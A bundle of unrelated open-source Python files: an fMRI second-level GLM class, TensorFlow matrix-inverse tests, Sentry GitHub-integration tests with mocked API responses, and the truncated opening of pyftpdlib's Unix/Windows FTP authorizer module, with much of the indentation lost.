def __init__(self, mask_img=None, smoothing_fwhm=None,
memory=Memory(None), memory_level=1, verbose=0,
n_jobs=1, minimize_memory=True):
self.mask_img = mask_img
self.smoothing_fwhm = smoothing_fwhm
if isinstance(memory, _basestring):
self.memory = Memory(memory)
else:
self.memory = memory
self.memory_level = memory_level
self.verbose = verbose
self.n_jobs = n_jobs
self.minimize_memory = minimize_memory
self.second_level_input_ = None
self.confounds_ = None
def fit(self, second_level_input, confounds=None, design_matrix=None):
""" Fit the second-level GLM
1. create design matrix
2. do a masker job: fMRI_data -> Y
3. fit regression to (Y, X)
Parameters
----------
second_level_input: list of `FirstLevelModel` objects or pandas
DataFrame or list of Niimg-like objects.
            Giving FirstLevelModel objects will make it easy to compute
            the second level contrast of arbitrary first level contrasts thanks
to the first_level_contrast argument of the compute_contrast
method. Effect size images will be computed for each model to
contrast at the second level.
            If a pandas DataFrame, it has to contain columns subject_label,
map_name and effects_map_path. It can contain multiple maps that
would be selected during contrast estimation with the argument
first_level_contrast of the compute_contrast function. The
DataFrame will be sorted based on the subject_label column to avoid
order inconsistencies when extracting the maps. So the rows of the
automatically computed design matrix, if not provided, will
correspond to the sorted subject_label column.
If list of Niimg-like objects then this is taken literally as Y
for the model fit and design_matrix must be provided.
confounds: pandas DataFrame, optional
Must contain a subject_label column. All other columns are
considered as confounds and included in the model. If
design_matrix is provided then this argument is ignored.
The resulting second level design matrix uses the same column
names as in the given DataFrame for confounds. At least two columns
are expected, "subject_label" and at least one confound.
design_matrix: pandas DataFrame, optional
Design matrix to fit the GLM. The number of rows
in the design matrix must agree with the number of maps derived
from second_level_input.
Ensure that the order of maps given by a second_level_input
list of Niimgs matches the order of the rows in the design matrix.
"""
# Check parameters
# check first level input
if isinstance(second_level_input, list):
if len(second_level_input) < 2:
                raise ValueError('A second level model requires a list with at '
'least two first level models or niimgs')
# Check FirstLevelModel objects case
if isinstance(second_level_input[0], FirstLevelModel):
models_input = enumerate(second_level_input)
for model_idx, first_level_model in models_input:
if (first_level_model.labels_ is None or
first_level_model.results_ is None):
raise ValueError(
'Model %s at index %i has not been fit yet'
'' % (first_level_model.subject_label, model_idx))
if not isinstance(first_level_model, FirstLevelModel):
raise ValueError(' object at idx %d is %s instead of'
' FirstLevelModel object' %
(model_idx, type(first_level_model)))
if confounds is not None:
if first_level_model.subject_label is None:
raise ValueError(
'In case confounds are provided, first level '
'objects need to provide the attribute '
                                'subject_label to match rows appropriately. '
'Model at idx %d does not provide it. '
'To set it, you can do '
'first_level_model.subject_label = "01"'
'' % (model_idx))
# Check niimgs case
elif isinstance(second_level_input[0], (str, Nifti1Image)):
if design_matrix is None:
raise ValueError('List of niimgs as second_level_input'
' require a design matrix to be provided')
for model_idx, niimg in enumerate(second_level_input):
if not isinstance(niimg, (str, Nifti1Image)):
raise ValueError(' object at idx %d is %s instead of'
' Niimg-like object' %
(model_idx, type(niimg)))
# Check pandas dataframe case
elif isinstance(second_level_input, pd.DataFrame):
for col in ['subject_label', 'map_name', 'effects_map_path']:
if col not in second_level_input.columns:
raise ValueError('second_level_input DataFrame must have'
' columns subject_label, map_name and'
' effects_map_path')
# Make sure subject_label contain strings
second_level_columns = second_level_input.columns.tolist()
labels_index = second_level_columns.index('subject_label')
labels_dtype = second_level_input.dtypes[labels_index]
            if labels_dtype != np.object:
raise ValueError('subject_label column must be of dtype '
'object instead of dtype %s' % labels_dtype)
elif isinstance(second_level_input, (str, Nifti1Image)):
if design_matrix is None:
raise ValueError('List of niimgs as second_level_input'
' require a design matrix to be provided')
second_level_input = check_niimg(niimg=second_level_input,
ensure_ndim=4)
else:
raise ValueError('second_level_input must be a list of'
' `FirstLevelModel` objects, a pandas DataFrame'
                             ' or a list of Niimg-like objects. Instead %s '
'was provided' % type(second_level_input))
# check confounds
if confounds is not None:
if not isinstance(confounds, pd.DataFrame):
raise ValueError('confounds must be a pandas DataFrame')
if 'subject_label' not in confounds.columns:
                raise ValueError('confounds DataFrame must contain column '
'"subject_label"')
if len(confounds.columns) < 2:
                raise ValueError('confounds should contain at least 2 columns, '
                                 'one called "subject_label" and the other '
                                 'with a given confound')
# Make sure subject_label contain strings
labels_index = confounds.columns.tolist().index('subject_label')
labels_dtype = confounds.dtypes[labels_index]
            if labels_dtype != np.object:
raise ValueError('subject_label column must be of dtype '
'object instead of dtype %s' % labels_dtype)
# check design matrix
if design_matrix is not None:
if not isinstance(design_matrix, pd.DataFrame):
raise ValueError('design matrix must be a pandas DataFrame')
# sort a pandas dataframe by subject_label to avoid inconsistencies
# with the design matrix row order when automatically extracting maps
if isinstance(second_level_input, pd.DataFrame):
columns = second_level_input.columns.tolist()
column_index = columns.index('subject_label')
sorted_matrix = sorted(
second_level_input.values, key=lambda x: x[column_index])
sorted_input = pd.DataFrame(sorted_matrix, columns=columns)
second_level_input = sorted_input
self.second_level_input_ = second_level_input
self.confounds_ = confounds
# Report progress
t0 = time.time()
if self.verbose > 0:
sys.stderr.write("Fitting second level model. "
"Take a deep breath\r")
# Select sample map for masker fit and get subjects_label for design
if isinstance(second_level_input, pd.DataFrame):
sample_map = second_level_input['effects_map_path'][0]
labels = second_level_input['subject_label']
subjects_label = labels.values.tolist()
elif isinstance(second_level_input, Nifti1Image):
sample_map = mean_img(second_level_input)
elif isinstance(second_level_input[0], FirstLevelModel):
sample_model = second_level_input[0]
sample_condition = sample_model.design_matrices_[0].columns[0]
sample_map = sample_model.compute_contrast(
sample_condition, output_type='effect_size')
labels = [model.subject_label for model in second_level_input]
subjects_label = labels
else:
# In this case design matrix had to be provided
sample_map = mean_img(second_level_input)
# Create and set design matrix, if not given
if design_matrix is None:
design_matrix = make_second_level_design_matrix(subjects_label,
confounds)
self.design_matrix_ = design_matrix
# Learn the mask. Assume the first level imgs have been masked.
if not isinstance(self.mask_img, NiftiMasker):
self.masker_ = NiftiMasker(
mask_img=self.mask_img, smoothing_fwhm=self.smoothing_fwhm,
memory=self.memory, verbose=max(0, self.verbose - 1),
memory_level=self.memory_level)
else:
self.masker_ = clone(self.mask_img)
for param_name in ['smoothing_fwhm', 'memory', 'memory_level']:
our_param = getattr(self, param_name)
if our_param is None:
continue
if getattr(self.masker_, param_name) is not None:
                    warn('Parameter %s of the masker overridden' % param_name)
setattr(self.masker_, param_name, our_param)
self.masker_.fit(sample_map)
# Report progress
if self.verbose > 0:
sys.stderr.write("\nComputation of second level model done in "
"%i seconds\n" % (time.time() - t0))
return self
def compute_contrast(
self, second_level_contrast=None, first_level_contrast=None,
second_level_stat_type=None, output_type='z_score'):
"""Generate different outputs corresponding to
the contrasts provided e.g. z_map, t_map, effects and variance.
Parameters
----------
second_level_contrast: str or array of shape (n_col), optional
Where ``n_col`` is the number of columns of the design matrix,
The string can be a formula compatible with the linear constraint
of the Patsy library. Basically one can use the name of the
conditions as they appear in the design matrix of
the fitted model combined with operators /\*+- and numbers.
Please check the patsy documentation for formula examples:
http://patsy.readthedocs.io/en/latest/API-reference.html#patsy.DesignInfo.linear_constraint
The default (None) is accepted if the design matrix has a single
column, in which case the only possible contrast array([1]) is
applied; when the design matrix has multiple columns, an error is
raised.
first_level_contrast: str or array of shape (n_col) with respect to
FirstLevelModel, optional
In case a list of FirstLevelModel was provided as
second_level_input, we have to provide a contrast to apply to
the first level models to get the corresponding list of images
desired, that would be tested at the second level. In case a
pandas DataFrame was provided as second_level_input this is the
map name to extract from the pandas dataframe map_name column.
It has to be a 't' contrast.
second_level_stat_type: {'t', 'F'}, optional
Type of the second level contrast
output_type: str, optional
Type of the output map. Can be 'z_score', 'stat', 'p_value',
'effect_size' or 'effect_variance'
Returns
-------
output_image: Nifti1Image
The desired output image
"""
if self.second_level_input_ is None:
raise ValueError('The model has not been fit yet')
# first_level_contrast check
if isinstance(self.second_level_input_[0], FirstLevelModel):
if first_level_contrast is None:
raise ValueError('If second_level_input was a list of '
'FirstLevelModel, then first_level_contrast '
'is mandatory. It corresponds to the '
'second_level_contrast argument of the '
'compute_contrast method of FirstLevelModel')
# check contrast definition
if second_level_contrast is None:
if self.design_matrix_.shape[1] == 1:
second_level_contrast = np.ones([1])
else:
raise ValueError('No second-level contrast is specified.')
if isinstance(second_level_contrast, np.ndarray):
con_val = second_level_contrast
if np.all(con_val == 0):
raise ValueError('Contrast is null')
else:
design_info = DesignInfo(self.design_matrix_.columns.tolist())
constraint = design_info.linear_constraint(second_level_contrast)
con_val = constraint.coefs
# check output type
if isinstance(output_type, _basestring):
if output_type not in ['z_score', 'stat', 'p_value', 'effect_size',
'effect_variance']:
raise ValueError(
'output_type must be one of "z_score", "stat"'
', "p_value", "effect_size" or "effect_variance"')
else:
raise ValueError('output_type must be one of "z_score", "stat",'
' "p_value", "effect_size" or "effect_variance"')
# Get effect_maps appropriate for chosen contrast
effect_maps = _infer_effect_maps(self.second_level_input_,
first_level_contrast)
# Check design matrix X and effect maps Y agree on number of rows
if len(effect_maps) != self.design_matrix_.shape[0]:
raise ValueError(
'design_matrix does not match the number of maps considered. '
'%i rows in design matrix do not match with %i maps' %
(self.design_matrix_.shape[0], len(effect_maps)))
# Fit an Ordinary Least Squares regression for parametric statistics
Y = self.masker_.transform(effect_maps)
if self.memory:
mem_glm = self.memory.cache(run_glm, ignore=['n_jobs'])
else:
mem_glm = run_glm
labels, results = mem_glm(Y, self.design_matrix_.values,
n_jobs=self.n_jobs, noise_model='ols')
# We save memory if inspecting model details is not necessary
if self.minimize_memory:
for key in results:
results[key] = SimpleRegressionResults(results[key])
self.labels_ = labels
self.results_ = results
# We compute contrast object
if self.memory:
mem_contrast = self.memory.cache(compute_contrast)
else:
mem_contrast = compute_contrast
contrast = mem_contrast(self.labels_, self.results_, con_val,
second_level_stat_type)
# We get desired output from contrast object
estimate_ = getattr(contrast, output_type)()
# Prepare the returned images
output = self.masker_.inverse_transform(estimate_)
contrast_name = str(con_val)
output.header['descrip'] = (
'%s of contrast %s' % (output_type, contrast_name))
return output
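# ---------------------------------------------------------------------------
# Minimal usage sketch for the class above (a one-sample second-level test).
# The NIfTI file names are hypothetical placeholders; any list of at least
# two first-level contrast images, or fitted FirstLevelModel objects, would
# be handled the same way by fit().
if __name__ == '__main__':
    contrast_imgs = ['sub-01_contrast.nii.gz',  # hypothetical paths
                     'sub-02_contrast.nii.gz',
                     'sub-03_contrast.nii.gz']
    # One intercept column, one row per input map (one-sample test).
    design = pd.DataFrame({'intercept': [1] * len(contrast_imgs)})
    model = SecondLevelModel(smoothing_fwhm=8.0)
    model.fit(contrast_imgs, design_matrix=design)
    # With a single-column design the default contrast array([1]) is used.
    z_map = model.compute_contrast(output_type='z_score')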
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.math_ops.matrix_inverse."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import benchmark
from tensorflow.python.platform import test
class InverseOpTest(test.TestCase):
def _verifyInverse(self, x, np_type):
for adjoint in False, True:
y = x.astype(np_type)
with self.cached_session(use_gpu=True):
# Verify that x^{-1} * x == Identity matrix.
inv = linalg_ops.matrix_inverse(y, adjoint=adjoint)
tf_ans = test_util.matmul_without_tf32(inv, y, adjoint_b=adjoint)
np_ans = np.identity(y.shape[-1])
if x.ndim > 2:
tiling = list(y.shape)
tiling[-2:] = [1, 1]
np_ans = np.tile(np_ans, tiling)
out = self.evaluate(tf_ans)
self.assertAllClose(np_ans, out, rtol=1e-4, atol=1e-3)
self.assertShapeEqual(y, tf_ans)
def _verifyInverseReal(self, x):
for np_type in [np.float32, np.float64]:
self._verifyInverse(x, np_type)
def _verifyInverseComplex(self, x):
for np_type in [np.complex64, np.complex128]:
self._verifyInverse(x, np_type)
def _makeBatch(self, matrix1, matrix2):
matrix_batch = np.concatenate(
[np.expand_dims(matrix1, 0),
np.expand_dims(matrix2, 0)])
matrix_batch = np.tile(matrix_batch, [2, 3, 1, 1])
return matrix_batch
def testNonsymmetric(self):
# 2x2 matrices
matrix1 = np.array([[1., 2.], [3., 4.]])
matrix2 = np.array([[1., 3.], [3., 5.]])
self._verifyInverseReal(matrix1)
self._verifyInverseReal(matrix2)
# A multidimensional batch of 2x2 matrices
self._verifyInverseReal(self._makeBatch(matrix1, matrix2))
matrix1 = matrix1.astype(np.complex64)
matrix1 += 1j * matrix1
matrix2 = matrix2.astype(np.complex64)
matrix2 += 1j * matrix2
self._verifyInverseComplex(matrix1)
self._verifyInverseComplex(matrix2)
# Complex batch
self._verifyInverseComplex(self._makeBatch(matrix1, matrix2))
def testSymmetricPositiveDefinite(self):
# 2x2 matrices
matrix1 = np.array([[2., 1.], [1., 2.]])
matrix2 = np.array([[3., -1.], [-1., 3.]])
self._verifyInverseReal(matrix1)
self._verifyInverseReal(matrix2)
# A multidimensional batch of 2x2 matrices
self._verifyInverseReal(self._makeBatch(matrix1, matrix2))
matrix1 = matrix1.astype(np.complex64)
matrix1 += 1j * matrix1
matrix2 = matrix2.astype(np.complex64)
matrix2 += 1j * matrix2
self._verifyInverseComplex(matrix1)
self._verifyInverseComplex(matrix2)
# Complex batch
self._verifyInverseComplex(self._makeBatch(matrix1, matrix2))
@test_util.deprecated_graph_mode_only
def testNonSquareMatrix(self):
# When the inverse of a non-square matrix is attempted we should return
# an error
with self.assertRaises(ValueError):
linalg_ops.matrix_inverse(np.array([[1., 2., 3.], [3., 4., 5.]]))
@test_util.deprecated_graph_mode_only
def testWrongDimensions(self):
# The input to the inverse should be at least a 2-dimensional tensor.
tensor3 = constant_op.constant([1., 2.])
with self.assertRaises(ValueError):
linalg_ops.matrix_inverse(tensor3)
def testNotInvertible(self):
# The input should be invertible.
with self.cached_session():
with self.assertRaisesOpError("Input is not invertible."):
# All rows of the matrix below add to zero.
tensor3 = constant_op.constant([[1., 0., -1.], [-1., 1., 0.],
[0., -1., 1.]])
linalg_ops.matrix_inverse(tensor3).eval()
def testEmpty(self):
self._verifyInverseReal(np.empty([0, 2, 2]))
self._verifyInverseReal(np.empty([2, 0, 0]))
def testRandomSmallAndLarge(self):
np.random.seed(42)
for dtype in np.float32, np.float64, np.complex64, np.complex128:
for batch_dims in [(), (1,), (3,), (2, 2)]:
for size in 8, 31, 32:
shape = batch_dims + (size, size)
matrix = np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape)).reshape(shape).astype(dtype)
self._verifyInverseReal(matrix)
@test_util.deprecated_graph_mode_only
def testConcurrentExecutesWithoutError(self):
with self.session(use_gpu=True) as sess:
all_ops = []
for adjoint_ in True, False:
matrix1 = random_ops.random_normal([5, 5], seed=42)
matrix2 = random_ops.random_normal([5, 5], seed=42)
inv1 = linalg_ops.matrix_inverse(matrix1, adjoint=adjoint_)
inv2 = linalg_ops.matrix_inverse(matrix2, adjoint=adjoint_)
all_ops += [inv1, inv2]
inv = self.evaluate(all_ops)
self.assertAllEqual(inv[0], inv[1])
self.assertAllEqual(inv[2], inv[3])
class MatrixInverseBenchmark(test.Benchmark):
shapes = [
(4, 4),
(10, 10),
(16, 16),
(101, 101),
(256, 256),
(1000, 1000),
(1024, 1024),
(2048, 2048),
(513, 4, 4),
(513, 16, 16),
(513, 256, 256),
]
def _GenerateMatrix(self, shape):
batch_shape = shape[:-2]
shape = shape[-2:]
assert shape[0] == shape[1]
n = shape[0]
matrix = np.ones(shape).astype(np.float32) / (
2.0 * n) + np.diag(np.ones(n).astype(np.float32))
return variables.Variable(np.tile(matrix, batch_shape + (1, 1)))
def benchmarkMatrixInverseOp(self):
for adjoint in False, True:
for shape in self.shapes:
with ops.Graph().as_default(), \
session.Session(config=benchmark.benchmark_config()) as sess, \
ops.device("/cpu:0"):
matrix = self._GenerateMatrix(shape)
inv = linalg_ops.matrix_inverse(matrix, adjoint=adjoint)
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
sess,
control_flow_ops.group(inv),
min_iters=25,
name="matrix_inverse_cpu_{shape}_adjoint_{adjoint}".format(
shape=shape, adjoint=adjoint))
if test.is_gpu_available(True):
with ops.Graph().as_default(), \
session.Session(config=benchmark.benchmark_config()) as sess, \
ops.device("/gpu:0"):
matrix = self._GenerateMatrix(shape)
inv = linalg_ops.matrix_inverse(matrix, adjoint=adjoint)
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
sess,
control_flow_ops.group(inv),
min_iters=25,
name="matrix_inverse_gpu_{shape}_adjoint_{adjoint}".format(
shape=shape, adjoint=adjoint))
if __name__ == "__main__":
test.main()
|
|
from __future__ import absolute_import
import responses
import six
import sentry
from mock import MagicMock
from six.moves.urllib.parse import parse_qs, urlencode, urlparse
from sentry.constants import ObjectStatus
from sentry.integrations.github import GitHubIntegrationProvider
from sentry.models import (
Identity, IdentityProvider, IdentityStatus, Integration, OrganizationIntegration,
Repository, Project
)
from sentry.plugins import plugins
from sentry.testutils import IntegrationTestCase
from tests.sentry.plugins.testutils import GitHubPlugin # NOQA
class GitHubIntegrationTest(IntegrationTestCase):
provider = GitHubIntegrationProvider
def setUp(self):
super(GitHubIntegrationTest, self).setUp()
self.installation_id = 'install_1'
self.user_id = 'user_1'
self.app_id = 'app_1'
self.access_token = 'xxxxx-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx'
self.expires_at = '3000-01-01T00:00:00Z'
self._stub_github()
def _stub_github(self):
responses.reset()
sentry.integrations.github.integration.get_jwt = MagicMock(
return_value='jwt_token_1',
)
sentry.integrations.github.client.get_jwt = MagicMock(
return_value='jwt_token_1',
)
responses.add(
responses.POST,
'https://github.com/login/oauth/access_token',
json={'access_token': self.access_token}
)
responses.add(
responses.POST,
'https://api.github.com/installations/{}/access_tokens'.format(
self.installation_id,
),
json={
'token': self.access_token,
'expires_at': self.expires_at,
}
)
responses.add(
responses.GET,
'https://api.github.com/user',
json={'id': self.user_id}
)
responses.add(
responses.GET,
u'https://api.github.com/installation/repositories',
json={
'repositories': [
{
'id': 1296269,
'name': 'foo',
'full_name': 'Test-Organization/foo',
},
{
'id': 9876574,
'name': 'bar',
'full_name': 'Test-Organization/bar',
},
],
}
)
responses.add(
responses.GET,
u'https://api.github.com/app/installations/{}'.format(
self.installation_id,
),
json={
'id': self.installation_id,
'app_id': self.app_id,
'account': {
'login': 'Test Organization',
'avatar_url': 'http://example.com/avatar.png',
'html_url': 'https://github.com/Test-Organization',
'type': 'Organization',
},
}
)
responses.add(
responses.GET,
u'https://api.github.com/user/installations',
json={
'installations': [{'id': self.installation_id}],
}
)
def assert_setup_flow(self):
resp = self.client.get(self.init_path)
assert resp.status_code == 302
redirect = urlparse(resp['Location'])
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/apps/sentry-test-app'
# App installation ID is provided
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({'installation_id': self.installation_id})
))
redirect = urlparse(resp['Location'])
assert resp.status_code == 302
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/login/oauth/authorize'
params = parse_qs(redirect.query)
assert params['state']
assert params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert params['response_type'] == ['code']
assert params['client_id'] == ['github-client-id']
# Compact list values into singular values, since there's only ever one.
authorize_params = {k: v[0] for k, v in six.iteritems(params)}
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({
'code': 'oauth-code',
'state': authorize_params['state'],
})
))
oauth_exchange = responses.calls[0]
req_params = parse_qs(oauth_exchange.request.body)
assert req_params['grant_type'] == ['authorization_code']
assert req_params['code'] == ['oauth-code']
assert req_params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert req_params['client_id'] == ['github-client-id']
assert req_params['client_secret'] == ['github-client-secret']
assert oauth_exchange.response.status_code == 200
auth_header = responses.calls[2].request.headers['Authorization']
assert auth_header == 'Bearer jwt_token_1'
self.assertDialogSuccess(resp)
return resp
@responses.activate
def test_plugin_migration(self):
accessible_repo = Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id=123,
)
inaccessible_repo = Repository.objects.create(
organization_id=self.organization.id,
name='Not-My-Org/other',
provider='github',
external_id=321,
)
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
# Updates the existing Repository to belong to the new Integration
assert Repository.objects.get(
id=accessible_repo.id,
).integration_id == integration.id
# Doesn't touch Repositories not accessible by the new Integration
assert Repository.objects.get(
id=inaccessible_repo.id,
).integration_id is None
@responses.activate
def test_disables_plugin_when_fully_migrated(self):
project = Project.objects.create(
organization_id=self.organization.id,
)
plugin = plugins.get('github')
plugin.enable(project)
# Accessible to new Integration
Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id=123,
)
assert 'github' in [p.slug for p in plugins.for_project(project)]
self.assert_setup_flow()
assert 'github' not in [p.slug for p in plugins.for_project(project)]
@responses.activate
def test_basic_flow(self):
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
assert integration.external_id == self.installation_id
assert integration.name == 'Test Organization'
assert integration.metadata == {
'access_token': self.access_token,
# The metadata doesn't get saved with the timezone "Z" character
# for some reason, so just compare everything but that.
'expires_at': self.expires_at[:-1],
'icon': 'http://example.com/avatar.png',
'domain_name': 'github.com/Test-Organization',
'account_type': 'Organization',
}
oi = OrganizationIntegration.objects.get(
integration=integration,
organization=self.organization,
)
assert oi.config == {}
idp = IdentityProvider.objects.get(type='github')
identity = Identity.objects.get(
idp=idp,
user=self.user,
external_id=self.user_id,
)
assert identity.status == IdentityStatus.VALID
assert identity.data == {
'access_token': self.access_token,
}
@responses.activate
def test_reassign_user(self):
self.assert_setup_flow()
# Associate the identity with a user that has a password.
# Identity should be relinked.
user2 = self.create_user()
Identity.objects.get().update(user=user2)
self.assert_setup_flow()
identity = Identity.objects.get()
assert identity.user == self.user
# Associate the identity with a user without a password.
# Identity should not be relinked.
user2.set_unusable_password()
user2.save()
Identity.objects.get().update(user=user2)
resp = self.assert_setup_flow()
assert '"success":false' in resp.content
assert 'The provided GitHub account is linked to a different user' in resp.content
@responses.activate
def test_reinstall_flow(self):
self._stub_github()
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
integration.update(status=ObjectStatus.DISABLED)
assert integration.status == ObjectStatus.DISABLED
assert integration.external_id == self.installation_id
resp = self.client.get('{}?{}'.format(
self.init_path,
urlencode({'reinstall_id': integration.id})
))
assert resp.status_code == 302
redirect = urlparse(resp['Location'])
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/apps/sentry-test-app'
# New Installation
self.installation_id = 'install_2'
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({'installation_id': self.installation_id})
))
redirect = urlparse(resp['Location'])
assert resp.status_code == 302
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/login/oauth/authorize'
params = parse_qs(redirect.query)
assert params['state']
assert params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert params['response_type'] == ['code']
assert params['client_id'] == ['github-client-id']
# Compact list values to make the rest of this easier
authorize_params = {k: v[0] for k, v in six.iteritems(params)}
self._stub_github()
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({
'code': 'oauth-code',
'state': authorize_params['state'],
})
))
mock_access_token_request = responses.calls[0].request
req_params = parse_qs(mock_access_token_request.body)
assert req_params['grant_type'] == ['authorization_code']
assert req_params['code'] == ['oauth-code']
assert req_params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert req_params['client_id'] == ['github-client-id']
assert req_params['client_secret'] == ['github-client-secret']
assert resp.status_code == 200
auth_header = responses.calls[2].request.headers['Authorization']
assert auth_header == 'Bearer jwt_token_1'
integration = Integration.objects.get(provider=self.provider.key)
assert integration.status == ObjectStatus.VISIBLE
assert integration.external_id == self.installation_id
@responses.activate
def test_disable_plugin_when_fully_migrated(self):
self._stub_github()
project = Project.objects.create(
organization_id=self.organization.id,
)
plugin = plugins.get('github')
plugin.enable(project)
# Accessible to new Integration - mocked in _stub_github
Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id='123',
)
# Enabled before
assert 'github' in [p.slug for p in plugins.for_project(project)]
self.assert_setup_flow()
# Disabled after Integration installed
assert 'github' not in [p.slug for p in plugins.for_project(project)]
|
|
#!/usr/bin/env python
# $Id: authorizers.py 979 2012-01-23 19:32:22Z g.rodola $
# pyftpdlib is released under the MIT license, reproduced below:
# ======================================================================
# Copyright (C) 2007-2012 Giampaolo Rodola' <g.rodola@gmail.com>
#
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# ======================================================================
"""An "authorizer" is a class handling authentications and permissions
of the FTP server. It is used by pyftpdlib.ftpserver.FTPHandler
class for:
- verifying user password
- getting user home directory
- checking user permissions when a filesystem read/write event occurs
- changing user when accessing the filesystem
This module contains two classes which implements such functionalities
in a system-specific way for both Unix and Windows.
"""
__all__ = []
import os
import errno
from pyftpdlib.ftpserver import DummyAuthorizer, AuthorizerError
def replace_anonymous(callable):
"""A decorator to replace anonymous user string passed to authorizer
    methods as first argument with the actual user used to handle
anonymous sessions.
"""
def wrapper(self, username, *args, **kwargs):
if username == 'anonymous':
username = self.anonymous_user or username
return callable(self, username, *args, **kwargs)
return wrapper
class _Base(object):
"""Methods common to both Unix and Windows authorizers.
Not supposed to be used directly.
"""
def __init__(self):
"""Check for errors in the constructor."""
if self.rejected_users and self.allowed_users:
raise ValueError("rejected_users and allowed_users options are "
"mutually exclusive")
users = self._get_system_users()
for user in (self.allowed_users or self.rejected_users):
if user == 'anonymous':
raise ValueError('invalid username "anonymous"')
if user not in users:
raise ValueError('unknown user %s' % user)
if self.anonymous_user is not None:
if not self.has_user(self.anonymous_user):
raise ValueError('no such user %s' % self.anonymous_user)
home = self.get_home_dir(self.anonymous_user)
if not os.path.isdir(home):
raise ValueError('no valid home set for user %s'
% self.anonymous_user)
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
if not password and not homedir and not perm and not msg_login \
and not msg_quit:
raise ValueError("at least one keyword argument must be specified")
if self.allowed_users and username not in self.allowed_users:
raise ValueError('%s is not an allowed user' % username)
if self.rejected_users and username in self.rejected_users:
raise ValueError('%s is not an allowed user' % username)
if username == "anonymous" and password:
raise ValueError("can't assign password to anonymous user")
if not self.has_user(username):
raise ValueError('no such user %s' % username)
if username in self._dummy_authorizer.user_table:
# re-set parameters
del self._dummy_authorizer.user_table[username]
self._dummy_authorizer.add_user(username, password or "",
homedir or os.getcwd(),
perm or "",
msg_login or "",
msg_quit or "")
if homedir is None:
self._dummy_authorizer.user_table[username]['home'] = ""
def get_msg_login(self, username):
return self._get_key(username, 'msg_login') or self.msg_login
def get_msg_quit(self, username):
return self._get_key(username, 'msg_quit') or self.msg_quit
def get_perms(self, username):
overridden_perms = self._get_key(username, 'perm')
if overridden_perms:
return overridden_perms
if username == 'anonymous':
return 'elr'
return self.global_perm
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
def _get_key(self, username, key):
if self._dummy_authorizer.has_user(username):
return self._dummy_authorizer.user_table[username][key]
def _is_rejected_user(self, username):
"""Return True if the user has been black listed via
allowed_users or rejected_users options.
"""
if self.allowed_users and username not in self.allowed_users:
return True
if self.rejected_users and username in self.rejected_users:
return True
return False
# Note: requires python >= 2.5
try:
import pwd
import spwd
import crypt
except ImportError:
pass
else:
__all__.extend(['BaseUnixAuthorizer', 'UnixAuthorizer'])
# the uid/gid the server runs under
PROCESS_UID = os.getuid()
PROCESS_GID = os.getgid()
class BaseUnixAuthorizer(object):
"""An authorizer compatible with Unix user account and password
database.
This class should not be used directly unless for subclassing.
Use higher-level UnixAuthorizer class instead.
"""
def __init__(self, anonymous_user=None):
if os.geteuid() != 0 or not spwd.getspall():
raise AuthorizerError("super user privileges are required")
self.anonymous_user = anonymous_user
if self.anonymous_user is not None:
if not self.anonymous_user in self._get_system_users():
raise ValueError('no such user %s' % self.anonymous_user)
try:
